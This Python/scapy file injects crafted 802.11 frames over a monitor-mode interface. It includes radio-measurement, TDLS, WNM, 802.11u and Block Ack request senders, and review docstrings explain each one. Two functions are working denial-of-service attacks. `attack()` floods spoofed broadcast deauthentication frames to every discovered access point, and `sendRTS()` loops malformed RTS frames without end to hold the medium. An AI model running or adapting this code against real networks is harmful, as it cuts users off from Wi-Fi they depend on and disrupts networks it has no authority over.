def send_statistics_req(bssid, src, dst):
    """Inject a Radio Measurement request action frame (STA statistics).

    The frame is a management action frame (type 0, subtype 13) sent from
    ``src`` to ``dst`` with BSSID ``bssid``, prepended with the module-level
    RadioTap header ``rt`` and sent on the module-level ``interface`` (which
    must be in monitor mode with injection support).  ``token`` (the dialog
    token) and ``next_sc()`` (sequence control) also come from module scope.

    ``dst`` is spliced raw into the frame body as the 6-byte peer address,
    so the address arguments are expected as raw 6-byte MAC strings (the
    same convention back_req() relies on) -- TODO confirm against callers.

    NOTE(review): the payload is assembled from hex-escaped ``str`` literals
    (Python 2 semantics).  Under Python 3 these must be ``bytes``; otherwise
    scapy UTF-8-encodes code points >= 0x80 and the frame is corrupted.
    """
    global token
    # Sub-elements carried inside the measurement request element.
    subel = "\x01\x10\x01\x00\x00\x00\xff\xff\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    # Element length: 3 fixed bytes + 6-byte peer address + 5 fixed bytes + sub-elements.
    elem_len = struct.pack("B", len(subel) + 3 + 6 + 5)
    body = "".join([
        "\x05\x00",               # category / action (Radio Measurement request, presumably)
        token,                    # dialog token
        "\x00\x01",               # repetitions
        "\x26",                   # element ID 0x26 -- Measurement Request per 802.11k, verify
        elem_len,
        "\x01\x0e\x07",           # measurement token / mode / type
        dst,                      # peer STA address (raw 6 bytes)
        "\xff\xff\x00\x00\x00",
        subel,
    ])
    header = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid,
                   SC=next_sc(), FCfield=0)
    sendp(rt / header / body, iface=interface, verbose=False, loop=0)
def send_tdls_disc(bssid, src, dst):
    """Inject a TDLS Discovery Request encapsulated in an 802.11 data frame.

    The request travels as a plain data frame (type 2, subtype 0, no
    ToDS/FromDS bits) carrying LLC/SNAP with ethertype 0x890d, followed by
    a fixed payload and the three raw addresses.  ``rt``, ``interface`` and
    ``next_sc()`` are module-level.  The address arguments are appended raw
    into the body, so they are expected as 6-byte MAC strings -- TODO confirm.

    NOTE(review): hex-escaped ``str`` literals assume Python 2; on Python 3
    the payload must be ``bytes``.  The original also declared
    ``global token`` without using it; that no-op is dropped here.
    """
    dot11 = Dot11(type=2, subtype=0, addr1=dst, addr2=src, addr3=bssid,
                  SC=next_sc(), FCfield=0)
    encap = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP(OUI=0x000000, code=0x890d)
    # Fixed TDLS header bytes followed by BSSID, initiator and responder addresses.
    payload = "\x02\x0c\x0a\x01\x65\x12" + bssid + src + dst
    frame = dot11 / encap / payload
    sendp(rt / frame, iface=interface, verbose=False, loop=0)
def send_load_req(bssid, src, dst):
    """Inject a Radio Measurement request action frame (channel load, per the name).

    Management action frame (type 0, subtype 13) from ``src`` to ``dst`` on
    BSSID ``bssid``; ``rt``, ``interface``, ``token`` and ``next_sc()`` are
    read from module scope.  Requires a monitor-mode interface.

    NOTE(review): hex-escaped ``str`` literals assume Python 2; on Python 3
    the payload must be ``bytes``.  A commented-out shorter variant of the
    measurement element that the original carried has been removed.
    """
    global token
    # Category/action, dialog token, repetitions, then the measurement
    # request element (ID 0x26, length 0x0d) with a fixed body.
    body = ("\x05\x00" + token + "\x00\x01"
            + "\x26\x0d\x01\x0e\x03\x04\x00\x00\x00\x64\x00\x01\x02\x01\x00")
    header = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid,
                   SC=next_sc(), FCfield=0)
    sendp(rt / header / body, iface=interface, verbose=False, loop=0)
def send_wnm_meas(bssid, src, dst):
    """Inject two WNM action frames, one per layout guess.

    Both are management action frames (type 0, subtype 13) with category
    0x0a and action 0x19; the first carries only those two bytes (the layout
    the names suggest Wireshark dissects), the second appends a 0x01 byte
    (the layout the names suggest the standard defines).  ``rt``,
    ``interface`` and ``next_sc()`` are module-level; each frame gets its
    own sequence number.  Monitor-mode interface required.

    NOTE(review): hex-escaped ``str`` literals assume Python 2; on Python 3
    the payload must be ``bytes``.  The original's unused ``global token``
    declaration is dropped.
    """
    def action_frame(payload):
        # Fresh sequence control per frame, as the original did.
        return Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid,
                     SC=next_sc(), FCfield=0) / payload

    variants = [
        action_frame("\x0a\x19"),       # "wireshark" layout
        action_frame("\x0a\x19\x01"),   # "standard" layout
    ]
    for frame in variants:
        sendp(rt / frame, iface=interface, verbose=False, loop=0)
def send_tdls_setup(bssid, src, dst):
    """Inject a TDLS Setup Request encapsulated in an 802.11 data frame.

    Same encapsulation as send_tdls_disc(): data frame (type 2, subtype 0),
    LLC/SNAP with ethertype 0x890d, then a minimal fixed payload
    (dialog token, capabilities, supported rates -- per the original's
    comment).  ``rt``, ``interface`` and ``next_sc()`` are module-level.

    NOTE(review): hex-escaped ``str`` literals assume Python 2; on Python 3
    the payload must be ``bytes``.  The original's unused ``global token``
    declaration is dropped.
    """
    # Dialog token - capabilities - supported rates
    payload = "\x02\x0c\x00\x01\xff\xff"
    encap = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP(OUI=0x000000, code=0x890d)
    dot11 = Dot11(type=2, subtype=0, addr1=dst, addr2=src, addr3=bssid,
                  SC=next_sc(), FCfield=0)
    sendp(rt / dot11 / encap / payload, iface=interface, verbose=False, loop=0)
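def attack(self):
    """Broadcast deauthentication frames on behalf of every discovered AP.

    For each BSSID in ``self.found_APs`` a deauth frame spoofed from the AP
    (addr2/addr3 = AP, addr1 = broadcast) is injected
    ``self.valueObj.count`` times, 0.1 s apart, on the monitor-mode
    interface ``self.valueObj.interfaceName``.

    Fixes relative to the previous version: the loop used
    ``range(0, len(self.found_APs) - 1)`` and therefore never deauthed the
    last AP (and did nothing at all with a single AP); it now iterates the
    whole list.  The progress message also printed ``found_APs[1]`` every
    time instead of the AP being targeted.  If the caller deliberately
    keeps a non-AP sentinel as the last list entry, restore the old bound.

    NOTE(review): this is a denial-of-service primitive -- use only against
    networks you are authorized to test.  Links protected by 802.11w (PMF)
    are expected to ignore unauthenticated deauth frames.
    """
    client = "FF:FF:FF:FF:FF:FF"  # broadcast: targets every station of the AP
    for ap in self.found_APs:
        print("Now deauthing all users from " + ap)
        # Deauth frame for this AP, spoofed as coming from the AP itself.
        packet = RadioTap() / Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
        # interface must be the monitor one
        sendp(packet, iface=self.valueObj.interfaceName,
              count=self.valueObj.count, inter=0.1, verbose=1)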
def send_wnm_eventreq(bssid, src, dst):
    """Inject two WNM Event Request action frames, one per layout guess.

    An element with ID 0x4E is built from the module-level dialog ``token``,
    two fixed bytes and an (empty) sub-element string; the length byte is
    computed with ``struct``.  Two management action frames (type 0,
    subtype 13, category/action 0x0a/0x00) are sent: one with the element
    directly after the action byte, one with an extra ``token`` byte in
    between.  ``rt``, ``interface`` and ``next_sc()`` are module-level.

    NOTE(review): hex-escaped ``str`` literals assume Python 2; on Python 3
    the payload must be ``bytes``.  The struct length byte wraps silently
    above 255, but with an empty sub-element that cannot happen here.
    """
    global token
    # A Channel Number sub-element ("\x01\x02\x04\x01") was tried originally;
    # the sub-element field is currently left empty.
    subel = ""
    elem_body = token + "\x02\x00" + subel
    elem = "\x4E" + struct.pack("B", len(elem_body)) + elem_body

    def action_frame(payload):
        return Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid,
                     SC=next_sc(), FCfield=0) / payload

    # "wireshark" layout: element immediately after category/action.
    frame_ws = action_frame("\x0a\x00" + elem)
    # "standard" layout: dialog token precedes the element.
    frame_std = action_frame("\x0a\x00" + token + elem)
    sendp(rt / frame_ws, iface=interface, verbose=False, loop=0)
    sendp(rt / frame_std, iface=interface, verbose=False, loop=0)
def sendRTS(MAC1, MAC2, MAC3):
    """Flood RTS control frames carrying a large Duration/ID value.

    The Duration/ID field is set to 615 byte-swapped (0x0267 -> 0x6702 =
    26370) by packing little-endian and unpacking big-endian; presumably
    this is meant to reserve the medium (NAV) -- verify against captures.
    The frame is a control frame (type 1, subtype 11) with an FCS flag in
    RadioTap, but it then has Beacon and Supported Rates layers appended,
    which an RTS does not normally carry; treat that as deliberate
    malformation unless the author says otherwise.

    ``sendp(..., loop=1)`` transmits forever at 0.1 s intervals and never
    returns, so this is a blocking denial-of-service primitive; interrupt
    with Ctrl-C.  ``monitor_if`` is module-level.  Assumes the bare
    ``Dot11FCS``/``sendp`` names and the ``scapy.`` prefixed ones refer to
    the same scapy module -- TODO confirm imports.
    """
    swapped = struct.pack("<H", 615)
    duration_id = struct.unpack(">H", swapped)[0]
    frame = scapy.RadioTap(present="Flags", Flags="FCS")
    frame = frame / Dot11FCS(addr1=MAC1, addr2=MAC2, addr3=MAC3,
                             addr4="00:00:00:00:00:00",
                             subtype=11, type=1, ID=duration_id)
    # Non-standard trailer for a control frame (see docstring).
    frame = frame / scapy.Dot11Beacon(cap="ESS", timestamp=1)
    frame = frame / scapy.Dot11EltRates(rates=[130, 132, 11, 22])
    # Blocks indefinitely: loop=1.
    sendp(frame, iface=monitor_if, inter=0.1, loop=1)
def inject(self, pkt, inter=0):
    """Transmit ``pkt`` at layer 2 on this object's interface (``self.name``).

    ``inter`` is the delay in seconds between packets when ``pkt`` is a
    list; output is silenced.  Whether the interface is in monitor mode is
    the caller's responsibility -- nothing here checks it.
    """
    send_opts = {"iface": self.name, "inter": inter, "verbose": False}
    sendp(pkt, **send_opts)
def send_link_measurement(bssid, src, dst):
    """Inject a Link Measurement request action frame.

    Management action frame (type 0, subtype 13) with category/action
    0x05/0x02, the module-level dialog ``token`` and two fixed bytes.
    ``rt``, ``interface`` and ``next_sc()`` are module-level; monitor-mode
    interface required.

    NOTE(review): hex-escaped ``str`` literals assume Python 2; on Python 3
    the payload must be ``bytes``.
    """
    global token
    payload = "\x05\x02" + token + "\x10\x10"
    header = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid,
                   SC=next_sc(), FCfield=0)
    sendp(rt / header / payload, iface=interface, verbose=False, loop=0)
def send_frame_req(bssid, src, dst):
    """Inject a Radio Measurement request action frame (frame request, per the name).

    Management action frame (type 0, subtype 13) with category/action
    0x05/0x00, the module-level dialog ``token``, repetitions, and a fixed
    measurement request element (ID 0x26, length 0x10).  ``rt``,
    ``interface`` and ``next_sc()`` are module-level.

    NOTE(review): hex-escaped ``str`` literals assume Python 2; on Python 3
    the payload must be ``bytes``.
    """
    global token
    meas_elem = "\x26\x10\x00\x0e\x06\x04\x00\xff\xff\x00\xff\x01\xff\xff\xff\xff\xff\xff"
    payload = "\x05\x00" + token + "\x00\x01" + meas_elem
    header = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid,
                   SC=next_sc(), FCfield=0)
    sendp(rt / header / payload, iface=interface, verbose=False, loop=0)
def send_dot11u_ql(bssid, src, dst):
    """Inject an 802.11u query action frame (GAS, per the function name).

    Management action frame (type 0, subtype 13) with category/action
    0x04/0x0a, the module-level dialog ``token`` and a fixed query body.
    ``rt``, ``interface`` and ``next_sc()`` are module-level; monitor-mode
    interface required.

    NOTE(review): hex-escaped ``str`` literals assume Python 2; on Python 3
    the payload must be ``bytes``.
    """
    global token
    query_body = "\x6c\x02\xff\x00\x06\x00\x00\x01\x02\x00\x01\x01"
    payload = "\x04\x0a" + token + query_body
    header = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid,
                   SC=next_sc(), FCfield=0)
    sendp(rt / header / payload, iface=interface, verbose=False, loop=0)
def back_req(bssid, src, dst):
    """Inject a hand-built Block Ack (ADDBA) request frame as raw bytes.

    Unlike the other senders this does not use scapy's ``Dot11`` layer: the
    whole 802.11 header is spelled out -- frame control 0xd0 0x00 (the same
    management/action subtype the other functions build with
    ``Dot11(type=0, subtype=13)``), a fixed duration, the three raw 6-byte
    addresses, and a hard-coded sequence control 0xb0b0 (``next_sc()`` is
    not used).  The action body uses a hard-coded dialog token 0x69 rather
    than the module-level ``token``; the original's ``global token`` was a
    no-op and is dropped.  ``rt`` and ``interface`` are module-level.

    NOTE(review): because the addresses are concatenated raw, they must be
    6-byte MAC strings; hex-escaped ``str`` literals assume Python 2 and
    must become ``bytes`` on Python 3.
    """
    mac_header = "\xd0\x00\x3a\x01" + dst + src + bssid + "\xb0\xb0"
    # Category 3 / action 0 / dialog token 0x69 / parameters / timeout / SSN -- verify against 802.11.
    action_body = "\x03\x00\x69\x02\x10\x00\x00\x60\xcd"
    sendp(rt / (mac_header + action_body), iface=interface, verbose=False, loop=0)